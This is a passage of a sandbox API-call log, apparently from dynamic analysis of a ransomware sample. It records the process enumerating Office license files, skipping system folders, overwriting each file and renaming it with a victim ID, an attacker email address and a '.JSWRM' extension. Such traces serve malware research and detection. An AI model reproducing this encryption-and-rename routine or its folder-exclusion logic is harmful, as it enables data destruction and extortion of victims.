cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.022] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0105.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.022] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11635) returned 1 [0105.022] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.022] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d70) returned 0x24c1d0 [0105.022] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d70, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d70, lpOverlapped=0x0) returned 1 [0105.028] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.028] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d70, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d70, lpOverlapped=0x0) returned 1 [0105.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.028] CloseHandle (hObject=0x45c) returned 1 [0105.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0105.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0105.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0105.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0105.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0105.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0105.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0105.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0105.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.028] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial3-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial3-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0105.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0105.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0105.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.029] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.029] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe607f17a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe607f17a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6117ab6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial4-pl.xrm-ms", cAlternateFileName="O36262~1.XRM")) returned 1 [0105.029] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2=".") returned 1 [0105.029] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2="..") returned 1 [0105.030] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2="...") returned 1 [0105.030] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2="windows") returned -1 [0105.030] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2="recovery") returned -1 [0105.030] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2="perflogs") returned -1 [0105.030] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2="documents and settings") returned 1 [0105.030] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.030] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2="system volume information") returned -1 [0105.030] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-pl.xrm-ms", lpString2="msocache") returned 1 [0105.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0105.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d260, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0105.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0105.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0105.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0105.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d298, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial4-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0105.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0105.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0105.030] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0105.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.030] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0105.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.031] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0105.031] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.031] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0105.031] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.033] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.033] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0105.033] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.033] CloseHandle (hObject=0x45c) returned 1 [0105.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0105.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0105.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0105.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.034] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0105.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.034] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.034] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0105.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0105.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0105.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0105.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.035] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe607f17a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe607f17a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe6222ba8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5a5f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial4-ppd.xrm-ms", cAlternateFileName="O3CAE8~1.XRM")) returned 1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2=".") returned 1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2="..") returned 1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2="...") returned 1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2="windows") returned -1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2="recovery") returned -1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2="perflogs") returned -1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2="system volume information") returned -1 [0105.035] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ppd.xrm-ms", lpString2="msocache") returned 1 [0105.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0105.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0105.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0105.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0105.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0105.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0105.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0105.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-ppd.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial4-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0105.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0105.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0105.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0105.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0105.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0105.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0105.036] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0105.036] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23135) returned 1 [0105.036] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5a50) returned 0x24c1d0 [0105.036] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5a50, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5a50, lpOverlapped=0x0) returned 1 [0105.222] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0105.222] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5a50, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5a50, lpOverlapped=0x0) returned 1 [0105.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0105.223] CloseHandle (hObject=0x45c) returned 1 [0105.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0105.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0105.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0105.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0105.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0105.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0105.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0105.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0105.223] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0105.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0105.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0105.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0105.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0105.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0105.223] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365HomePremR_SubTrial4-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365homepremr_subtrial4-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0105.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0105.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0105.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0105.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0105.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0105.225] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe600ca61, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe600ca61, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe60cb644, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d73, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365HomePremR_SubTrial4-ul-oob.xrm-ms", cAlternateFileName="O3B67A~1.XRM")) returned 1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2=".") returned 1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2="..") returned 1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2="...") returned 1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2="windows") returned -1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0105.225] lstrcmpiW (lpString1="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0105.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0105.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0105.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0105.225] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365HomePremR_SubTrial4-ul-oob.xrm-ms", cchWideChar=37, lpMultiByteStr=0x22d260, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365HomePremR_SubTrial4-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 37 [0105.225] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0105.225] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0105.226] WideCharToMultiByte (in: CodePage=0xfde9, 